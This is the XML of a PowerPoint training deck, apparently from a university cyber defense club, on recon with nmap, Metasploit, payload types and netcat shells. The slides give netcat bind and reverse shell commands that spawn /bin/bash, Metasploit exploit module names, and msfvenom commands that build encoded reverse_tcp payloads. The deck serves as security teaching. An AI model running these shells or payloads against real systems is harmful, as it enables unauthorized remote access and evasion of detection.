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9" r:id="rId4"/>
    <p:sldId id="282" r:id="rId5"/>
    <p:sldId id="280" r:id="rId6"/>
    <p:sldId id="283" r:id="rId7"/>
    <p:sldId id="288" r:id="rId8"/>
    <p:sldId id="284" r:id="rId9"/>
    <p:sldId id="287" r:id="rId10"/>
    <p:sldId id="291" r:id="rId11"/>
    <p:sldId id="292" r:id="rId12"/>
    <p:sldId id="286" r:id="rId13"/>
    <p:sldId id="279" r:id="rId14"/>
    <p:sldId id="290" r:id="rId15"/>
    <p:sldId id="28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>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="84" d="100"/>
          <a:sy n="84" d="100"/>
        </p:scale>
        <p:origin x="677" y="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2/15/2017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2/15/2017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2/15/2017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2/15/2017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2/15/2017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2/15/2017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2/15/2017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2/15/2017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2/15/2017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2/15/2017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2/15/2017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2/15/2017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Recon &amp; metasploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2016-2017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Reverse Shell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1905000"/>
            <a:ext cx="8990329" cy="37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9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Shell vs. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Reverse Shell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 Shell:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Target machine: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nvlp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 1337 –e /bin/bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacking machine: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>target_machine_ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 1337 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reverse Shell:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Target machine: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>attacking_machine_ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 1337 –e /bin/bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacking machine: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nvlp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 1337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742929" cy="4462272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of metasploit exploits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exploit/multi/samba/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usermap_script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>use exploit/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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>distcc_exec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>use exploit/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irc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/unreal_ircd_3281_backdoor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enum4linux (found the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> share)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>use auxiliary/admin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>samba_symlink_traversal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Payloads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msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/x86/shell/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> LHOST=192.168.1.9 LPORT=999 -e x86/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shikata_ga_nai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> --platform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -f raw &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>genshell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>After selecting payload to use:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>generate -b '\x00' -e x86/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shikata_ga_nai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -o LHOST=192.168.1.9,LPORT=7777 -f /root/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>temppayload</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set encoder x86/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shikata_ga_nai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NMAP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> vs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Ncat</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bind vs Reverse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– OS detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>T – Timing template (1-5, 5 being the fastest)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>port_number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (or port range)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nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –p 22 127.0.0.1 OR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –p 1-100 127.0.0.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scanning a subnet: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 192.168.1.1/24</a:t>
            </a:r>
          </a:p>
          <a:p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– simple ping (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is the newer version)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Vulnerabilities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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ExploitDB</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SearchSploit</a:t>
            </a:r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scripts (/user/share/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/scripts)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enum4Linux (windows and samba)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tons of other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Metasploit is an exploitation framework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (metasploit framework interface)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Auxillary</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scanning, fuzzing, sniffing, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An exploit without a payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A module that uses a payload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Shellcode, code that runs remotely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Staged Payloads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payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Contains the exploit and full shell code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>More stable, but larger than staged payloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Staged payload:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Contains multiple parts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A stager is sent to download a larger payload (the stage)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Less stable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Armitage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GUI for metasploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Don’t Hail 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vs. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Ncat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Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a networking utility for reading and writing to/from network connections on TCP/UDP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Ncat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a better implementation of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It allows for encryption of bind and reverse shells to avoid intrusion detection systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It also supports authentication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Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Bind Shell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1905000"/>
            <a:ext cx="8915400" cy="37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348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UMBC Cyber Defense Team</vt:lpstr>
      <vt:lpstr>Overview</vt:lpstr>
      <vt:lpstr>NMAP</vt:lpstr>
      <vt:lpstr>Finding Vulnerabilities</vt:lpstr>
      <vt:lpstr>Metasploit</vt:lpstr>
      <vt:lpstr>Single vs. Staged Payloads</vt:lpstr>
      <vt:lpstr>Armitage</vt:lpstr>
      <vt:lpstr>Netcat vs. Ncat</vt:lpstr>
      <vt:lpstr>Netcat Bind Shell</vt:lpstr>
      <vt:lpstr>Netcat Reverse Shell</vt:lpstr>
      <vt:lpstr>Bind Shell vs. Reverse Shell</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>A couple of metasploit exploits</vt:lpstr>
      <vt:lpstr>Encoding Payloads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2017-02-16T01:57:38Z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